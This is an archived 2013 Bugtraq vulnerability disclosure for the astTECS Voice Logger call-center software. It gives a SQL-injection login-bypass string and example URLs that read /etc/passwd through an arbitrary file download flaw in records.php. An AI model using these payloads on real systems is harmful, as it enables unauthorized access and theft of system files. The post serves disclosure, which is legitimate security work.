| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAHKpqwauhj94Gya_8P_tXSLOVidBVFbabr6MML_bg2pCZDj8WQ@mail.gmail.com> Date: Tue, 16 Jul 2013 11:01:05 +0200 From: Michał Błaszczak <blaszczakm@...il.com> To: bugtraq@...urityfocus.com Subject: Voice Logger astTECS - bypass login & arbitrary file download Author: Michal Blaszczak Website: http://blaszczakm.blogspot.com Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip Date: 16.07.2013 Voice Logger - VoIP software for Call Center 1) bypass login login: admin' or 1='1 password: admin line: 168 file: manager_login.server.php 2) arbitrary file download http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd linie: 2 file:records.php http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd linie: 2 file:records.php 3) and other security bugs Michał Błaszczak http://blaszczakm.blogspot.com
Powered by blists - more mailing lists